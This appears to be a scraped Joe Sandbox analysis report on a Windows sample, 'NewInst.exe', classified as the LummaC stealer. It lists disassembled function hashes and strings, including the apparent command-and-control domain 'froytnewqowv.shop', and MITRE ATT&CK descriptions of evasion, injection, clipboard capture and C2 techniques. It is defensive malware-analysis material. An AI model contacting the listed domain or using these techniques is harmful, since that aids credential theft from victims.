Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 3e1d0d75cd803ff25e5e8952406537c0af8e8607f5ad0a7e932edbcf9746dbd7
Instruction ID: 842228f2b59bd4dbd5bbab8fc9b32e1b7e878de475dc68b932edb89dc74c53f1
Opcode Fuzzy Hash: 3e1d0d75cd803ff25e5e8952406537c0af8e8607f5ad0a7e932edbcf9746dbd7
Instruction Fuzzy Hash: 9FD15872B083209FC714CE25A44076BB7EAAF94310F59856EF85987392E738DD44C7DA

Function 004369D0 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

, xrefs: 00436A36, 00436AFE, 00436AD6, 00436A06

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 70d21ae3325e249cc2d1863d6a9b32c484c61923207258b0b186c1ea56b1ded2
Instruction ID: a11bad8a5117d6008fa8afd295ab5da61cb6abc6f9e6800b254883442853e389
Opcode Fuzzy Hash: 70d21ae3325e249cc2d1863d6a9b32c484c61923207258b0b186c1ea56b1ded2
Instruction Fuzzy Hash: 4791BE34208312ABC714DF18D490A2BB3E1FF89744F19E92DE9858B351E735EC61CB9A

Function 00435FA0 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

, xrefs: 00436002, 004360C1, 00436098, 00435FD6

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 73e5d13f241908827d1f3693456dc44e2ca49ef14a3c4ae2f49d96f1a2a7bc0d
Instruction ID: f23b7510866d6ae72eb0c1bc0bc094d71102c9efb2610442adc6adee68c30d61
Opcode Fuzzy Hash: 73e5d13f241908827d1f3693456dc44e2ca49ef14a3c4ae2f49d96f1a2a7bc0d
Instruction Fuzzy Hash: 7B417F74208201ABD718DF15D991B2FB7E1EF89704F25982DE58987351C379EC60CB5A

Function 00436140 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

, xrefs: 004361A2, 00436261, 00436238, 00436176

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 943259fdc1551cf42ee4e111727b636990cc9f36da26f45479c24218037b0e60
Instruction ID: 980d032a2ccab8b13fc54050dfb9ef671ec0b839e70ad6ed49583019234b5b0b
Opcode Fuzzy Hash: 943259fdc1551cf42ee4e111727b636990cc9f36da26f45479c24218037b0e60
Instruction Fuzzy Hash: 0E416C74208302ABD714DF14D990B2BB7E5EF89704F26982DE5C987391C379EC61CB5A

Function 00412E3B Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

^'A, xrefs: 00412EF8

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ^'A
API String ID: 0-1115494859
Opcode ID: 1a4a8eb445baa188e5e7a4cf8b0482d4fd67054580c74f24571caad32a4e6156
Instruction ID: 203798fe745c7220f1c2eab9da18ecd5ea8b2d81011be8df25f5f8d277f5cacd
Opcode Fuzzy Hash: 1a4a8eb445baa188e5e7a4cf8b0482d4fd67054580c74f24571caad32a4e6156
Instruction Fuzzy Hash: A52157706083818FD758CF25E59076BB7F1AB8A308F485C2DE49AD3291D778E815CB5A

Function 00432300 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

, xrefs: 0043235E, 00432336

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-3019521637
Opcode ID: 2d058f2f8de9a2dcc9848fe31210da34a762378bb3631bbbea18fa36358c80ac
Instruction ID: 875a26e279d7381d0af767f6c00f5f85f65134fa295d14b1ebe10ffff4b4c7e0
Opcode Fuzzy Hash: 2d058f2f8de9a2dcc9848fe31210da34a762378bb3631bbbea18fa36358c80ac
Instruction Fuzzy Hash: 7811A235508244AFD300EF18D94092BB7F9FB99744F54991EEAC453311D3B9ED21CB9A

Function 00415DA4 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

]A, xrefs: 00415D9E

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ]A
API String ID: 0-3942631043
Opcode ID: 04a3fd9999e6ecfc76036dbf5dee8a176cbe408347b4fe7652bde634114f2f17
Instruction ID: 7f6e6c05b7f8f05a7ae5c04d311609f6adbde687a93e1d8a3b9919adef772a54
Opcode Fuzzy Hash: 04a3fd9999e6ecfc76036dbf5dee8a176cbe408347b4fe7652bde634114f2f17
Instruction Fuzzy Hash: 980175B5D00615BBEB109FA59C4ABEF7E78EB0A314F504115F615B32C1D37499108BF6

Function 00404460 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f17ceddfb5241087e9c57c7a95d82c784a2e9bfe4846ee70c9b688d5bff275
Instruction ID: 064834dbd3d1054dd233962f981297999305c84d226ad575e0cdd7f360641099
Opcode Fuzzy Hash: d4f17ceddfb5241087e9c57c7a95d82c784a2e9bfe4846ee70c9b688d5bff275
Instruction Fuzzy Hash: 3852C3B16083458FCB14CF14C0906AABBE1BFC9314F198A7EE99967391D778E845CF89

Function 004098D0 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f763939b2cee4f850320c00966844c6e6f1c79b71503d7d58ff62e43b177fd
Instruction ID: 9a842cbe924d001d4efeaaa345915f8c7242cdd81e2c076dfa7d48468fe1765f
Opcode Fuzzy Hash: e8f763939b2cee4f850320c00966844c6e6f1c79b71503d7d58ff62e43b177fd
Instruction Fuzzy Hash: E7E1D47160C7818BC319CE28C4E026BFBE2AFD5314F288A6EE4D6573D6D6389D45CB46

Function 0040BD2D Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16c0b4d655480e21df94844036d9e90936d9e09815273aedee5e4568dcf98db1
Instruction ID: d4b2d70a6bda1a082e1dd372b14f4466324b72ac5c87dc8cb21ce7fbef2df808
Opcode Fuzzy Hash: 16c0b4d655480e21df94844036d9e90936d9e09815273aedee5e4568dcf98db1
Instruction Fuzzy Hash: E3814574604641CFE3248F28C8A0B27B7F6FF4A705F24992DE5D6877A1D734A815CB89

Function 0041F6D0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd7e78f6e072d29a2cb5640edb0ae9d2340d7a64075e57dd1611cf9108de512
Instruction ID: 84e8ea41ee2fa4a408cd962cf6b7fbc1c887c5fb02869ff04425e89c505035da
Opcode Fuzzy Hash: 0cd7e78f6e072d29a2cb5640edb0ae9d2340d7a64075e57dd1611cf9108de512
Instruction Fuzzy Hash: C8A1147010C3918FD324CF59C5A075FFBE2ABC6708F44891DE4EA6B281C778990ACB96

Function 0041A3C9 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f735a305843e7261033a0ea418a6c7406f55c97029b295ec72b354e0d80f762
Instruction ID: eef38122a372146c7dc8ca99d4a2e2ceaf4d41f073e4a183094bf46801ec1ca0
Opcode Fuzzy Hash: 2f735a305843e7261033a0ea418a6c7406f55c97029b295ec72b354e0d80f762
Instruction Fuzzy Hash: 8F61CE35208212DFD304CF28D8E066AB3A2FF89315F1989BDD985972A1C739E966CB45

Function 004033F0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10313183f2584f887ee6fddf3a8a644a9567b3c62f96c4de2e6a20931a2521e9
Instruction ID: a34cf8c9b3263d986cef6c7a4f2b3ed8ccbd40b807e0fd2d544b2ec9381f7a00
Opcode Fuzzy Hash: 10313183f2584f887ee6fddf3a8a644a9567b3c62f96c4de2e6a20931a2521e9
Instruction Fuzzy Hash: D931FE31A042009BC7119E19D880927BBE5EFC5359F14853EE899EF3C2D339DE52CB4A

Function 0042A340 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: b69e15c13213328031daa6fc29d6b273f428c9ad2818b706eacf13d1ac7ca9a0
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: F911EC337051E50FC316CD3C94005657F930B93634B5D839AFCB5972D2D6268D8A835A

Function 004208D0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43676ebcf58ec10a06ef5f61cdcabf1e7382bafc69ccf0f619f461c0d6ee15e2
Instruction ID: 31a0624a4a46d16e19d5b355f68729ef89125fcf4f20361c633fe1305b320aad
Opcode Fuzzy Hash: 43676ebcf58ec10a06ef5f61cdcabf1e7382bafc69ccf0f619f461c0d6ee15e2
Instruction Fuzzy Hash: 220175F270031157E721AE66A8C173BB6E85F81708F58453EE80567383EB79EC45C699

Function 004190D0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: 61e5d2be95d78edd54caaac1bb55599e16c5a953c8f2358b80d4956ee11b2de8
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: B201A27BA013139B9324CE5DC4E0AABB3B0FF86794B1A446ED5801B371D7319D998264

Function 00404110 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4589a01fcbf53c33c173ba8121fd841452cd6f4a327d92e30b51b332093802db
Instruction ID: e11f0ee1f075e1e901a9b13e82fcc15b54626e6f218dbd9b55903be9e8aae077
Opcode Fuzzy Hash: 4589a01fcbf53c33c173ba8121fd841452cd6f4a327d92e30b51b332093802db
Instruction Fuzzy Hash: 58F02B767183150FA310DDBA9CC8927B3E5E7D9314B080139EF50D7341D535D801D1E8

Function 00413540 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 783cc59b554c714dab426553ce58be7964f6c22e1baddd6690b101552204b045
Instruction ID: 3fc446d2c8d8437f42dc4d6f3e8ddbc02f80558e7a69112f4d3dc03e7a12f602
Opcode Fuzzy Hash: 783cc59b554c714dab426553ce58be7964f6c22e1baddd6690b101552204b045
Instruction Fuzzy Hash: 96F05CF1A0411037DB22CD859CC0F77BF9CCB8B758F09086AE84193202D1759984C3E9

Function 0040F277 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ff4968333533510a584e1eec7dd6e447b9ff8387ce9556cc3f2703954da562
Instruction ID: a0d2468f465293a4e4ff370f25d342222911c81806e90c25baaa396ef0c5de9c
Opcode Fuzzy Hash: a0ff4968333533510a584e1eec7dd6e447b9ff8387ce9556cc3f2703954da562
Instruction Fuzzy Hash: 8201EFB46093819FE308DF28D491A2BB7E4AF86304F044C6DF495A7691E338D9198B6A

Function 004304B0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
Instruction ID: 9fc6d226bfb1604207242c1f049888613e19608d57fecf5ad2bb85126009cf98
Opcode Fuzzy Hash: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
Instruction Fuzzy Hash: CCE0C237B0522107A764CE369C21677F3E1EBDA721F4DA62EE142E3248D238C8418268

Function 0042ED70 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d114e315e1278ad0bb405f2103492c513b9ddf5d70b869fc0a4a3a0a19a325
Instruction ID: 55d4172f3244f021d817f9b096e4600c5599b633775831c15ef76054ad7f78f4
Opcode Fuzzy Hash: 54d114e315e1278ad0bb405f2103492c513b9ddf5d70b869fc0a4a3a0a19a325
Instruction Fuzzy Hash: 86D017B0949348ABD154AA12CC46F37B67CAB8B609F44290CF5C9272C1E6A5E914C72A

Function 0041A1D7 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5f5303165e91f16e1e8b19cc459c076d162991286b36ddc253054db009ee91
Instruction ID: ab8cdcc03201a52952a345f7ea54a144f4610d0c64eb4def9f98c58a5c069279
Opcode Fuzzy Hash: 3e5f5303165e91f16e1e8b19cc459c076d162991286b36ddc253054db009ee91
Instruction Fuzzy Hash: 19B09230A18201AE8200CE1088800B5F6B5628F241F30B8258049A3112D230E5418B8E

Function 0041A1E0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd3766918e89df8a05e257ca795833cd2a575d954b4001750cb2654bfadbcc9
Instruction ID: 6ba26a1bffbc1308ef423d47b87c80740494c3e6e5ed07ba0644021aaf96ce3c
Opcode Fuzzy Hash: 6fd3766918e89df8a05e257ca795833cd2a575d954b4001750cb2654bfadbcc9
Instruction Fuzzy Hash: A3B09230A082008F8200CF04C080465F7B4A78F201F20B054D008A3222C230E4008B88

Function 0042774E Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 87COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00427754
VariantInit.OLEAUT32 ref: 00427763

Strings

5, xrefs: 0042778B
:, xrefs: 004277C3
1, xrefs: 00427793
+, xrefs: 004277BB
#, xrefs: 004277DB
+, xrefs: 004277AB

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: #$+$+$1$5$:
API String ID: 2610073882-3087341364
Opcode ID: 0e036653b9d14adfec31b3634da6ee46a983eaf88ee37d663b34d55c39bb5962
Instruction ID: 9298a9f606e848f4f3e6587390da7264498acbc491bd68e4a9d42526ddd2c4e3
Opcode Fuzzy Hash: 0e036653b9d14adfec31b3634da6ee46a983eaf88ee37d663b34d55c39bb5962
Instruction Fuzzy Hash: A8410960108BC18ED726DF3C8488606BFA06B26324F08869DD8E54F3D7C774D515DBA6

Function 0040D590 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(4FDD498F,00000104), ref: 0040D9EB

Strings

{OG, xrefs: 0040D678
TW, xrefs: 0040D929
froytnewqowv.shop, xrefs: 0040D9CC

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: DirectorySystem
String ID: {OG$TW$froytnewqowv.shop
API String ID: 2188284642-1958746240
Opcode ID: 89c259094a7adb61a5788674474846ab91c95ccaf2b26d7fe638388223d8980b
Instruction ID: 6f7664552f2f1e33eb5c38cf136155b76137aa14af66036d354a58f4bd12b393
Opcode Fuzzy Hash: 89c259094a7adb61a5788674474846ab91c95ccaf2b26d7fe638388223d8980b
Instruction Fuzzy Hash: A9C188B050E3909FD3318F15D884B9BBBE1EBCA318F144A6DD4C86B291C7359909CB9B

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NewInst.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

